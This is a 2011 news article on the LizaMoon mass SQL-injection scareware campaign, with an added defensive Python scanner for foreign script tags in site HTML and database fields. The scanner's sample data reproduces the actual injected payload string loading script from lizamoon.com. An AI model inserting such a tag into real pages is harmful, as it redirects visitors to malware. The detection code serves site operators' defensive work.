LizaMoon: Scareware Attack Hits 1.5 Million Websites

by Jordan Yerman | April 1, 2011 at 03:49 pm

LizaMoon Mass-Injection Attack Touts 'Windows Stability Center' Malware

There's a mass-injection attack spreading across the web called LizaMoon. LizaMoon hijacks visitors to infected sites and reroutes them to a scareware site. The attack injects a script tag into the targeted site's pages, and the script it loads performs the redirect. Oddly, the redirect only fires once per IP address: if you get rerouted and don't take the bait, your next visit to the infected site goes through uninterrupted.
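For a site operator, the thing to hunt for is that injected script tag. The scanner below is an added example, not code from this article or from Websense: it parses HTML (or text fields dumped straight from a database) for `<script src>` tags whose host lies outside the site's own domains, treats scheme-relative URLs as remote so they cannot slip past, and flags non-http(s) schemes outright. The sample pages, the acme-widgets.example hostnames and the record IDs are constructed; lizamoon.com appears only as sample data, as the domain the attack was named after.

```python
"""Scan HTML or dumped text fields for <script src> tags that load from a
host outside the site's own domains.

Added example, not code from the article or from Websense. The sample pages,
the acme-widgets.example hostnames and the record IDs are constructed;
lizamoon.com appears only as sample data, as the domain the attack was named
after.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> start tag."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value.strip())


def host_allowed(host, allowed_hosts):
    """True if host is one of allowed_hosts or a subdomain of one."""
    return any(host == a or host.endswith("." + a) for a in allowed_hosts)


def find_foreign_scripts(html, allowed_hosts):
    """Return the script src values in html that load from elsewhere.

    Path-relative srcs resolve to the page's own origin and are ignored.
    Scheme-relative srcs (//host/x.js) carry a netloc and are checked like
    absolute ones. Any non-http(s) scheme (data:, javascript:) is flagged,
    since a legitimate page has no reason to load a script that way.
    """
    allowed = {h.lower().strip(".") for h in allowed_hosts}
    collector = ScriptSrcCollector()
    collector.feed(html)
    collector.close()
    foreign = []
    for src in collector.srcs:
        parsed = urlparse(src)
        if parsed.scheme and parsed.scheme not in ("http", "https"):
            foreign.append(src)
            continue
        if not parsed.netloc:
            continue  # relative path: same origin as the page itself
        if not host_allowed((parsed.hostname or "").lower(), allowed):
            foreign.append(src)
    return foreign


def scan_records(records, allowed_hosts):
    """Run the check over (record_id, text) pairs dumped from a database.

    A mass-injection payload lands in ordinary text columns, so the raw field
    values can be scanned directly; the parser copes with fragments and with
    the stray </title> that an injected tag typically leaves behind.
    """
    hits = {}
    for record_id, text in records:
        foreign = find_foreign_scripts(text, allowed_hosts)
        if foreign:
            hits[record_id] = foreign
    return hits


# Constructed sample data: the site's own hosts, a clean page, an injected
# page, and three rows as they might be dumped from a CMS text column.
SITE_HOSTS = ["acme-widgets.example"]

CLEAN_PAGE = """<html><head><title>Acme Widgets</title>
<script src="/static/app.js"></script>
<script src="https://cdn.acme-widgets.example/lib.js"></script>
</head><body>Hello</body></html>"""

INJECTED_PAGE = """<html><head><title>Acme Widgets</title><script src=http://lizamoon.com/ur.php></script></title>
<script src="/static/app.js"></script>
</head><body>Hello</body></html>"""

SAMPLE_RECORDS = [
    (1, "Spring sale on all widgets"),
    (2, "Contact us</title><script src=http://lizamoon.com/ur.php></script>"),
    (3, 'Partner badge <script src="//cdn.acme-widgets.example/badge.js"></script>'),
]

if __name__ == "__main__":
    print("clean page:", find_foreign_scripts(CLEAN_PAGE, SITE_HOSTS))
    print("injected page:", find_foreign_scripts(INJECTED_PAGE, SITE_HOSTS))
    print("database rows:", scan_records(SAMPLE_RECORDS, SITE_HOSTS))
```

Run it over a dump of every text column rather than only over rendered pages: the redirect fires once per IP, so a crawler that has already been served the payload once will see a clean page on its next visit, while the database still carries the tag.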

Once redirected to the scareware site, the user is presented with a popup window claiming the computer is at risk. Clicking OK takes the user to "Windows Stability Center", which performs a fake scan of the system.

There's no such thing as Windows Stability Center: the "scan" is just JavaScript animating a progress bar and a list of invented detections in the browser, and never inspects the user's machine. Once the fake scan finishes, the user is prompted to remove the "viruses". Clicking Remove All will, of course, install malware. Pwned.

Web security firms are not yet sure which vulnerability is being exploited in the LizaMoon attack, which is named after lizamoon.com, the first domain seen hosting the injected script. Most antivirus products do not yet detect the Windows Stability Center malware.

List of Infected Sites

WebSense is building a list of infected sites, but the number is astronomical, and still growing. LizaMoon has not been contained. The injected script has even turned up in URLs associated with the iTunes Music Store, because iTunes pulls podcast feeds from third-party sites that were compromised.

Let's turn it over to WebSense:

Q: How many sites have been affected by this?
A: It's really hard to say. Google Search indicates it's over 1.5 million URLs but that number could be over-inflated. It's safe to say it's in the hundreds of thousands.

Q: How does the script get added to the compromised sites?
A: We're still looking into that. We know that it uses SQL Injection to do it and not XSS as some of our blog readers have suggested.

The domains used in this attack, including the redirect URLs and the server where the malware is hosted, are all associated with one of four IP addresses, according to Dancho Danchev, an independent security expert. While the 20 or so domains being used as the redirect URL rotate between two IP addresses, Danchev has identified more than 120 India-based or Cocos Islands-based domains all pointing to one malware host server, and 50 India-based domains going to another.

Videos

Video: LizaMoon mass injection explained (sourced by Jordan Yerman)
Comments

Tenea Bogdan

I am now trying to work on a quick-fix for infected sites. For this I need examples of infected files. Please help by uploading your infected websites at http://lizamoon.tenea.eu
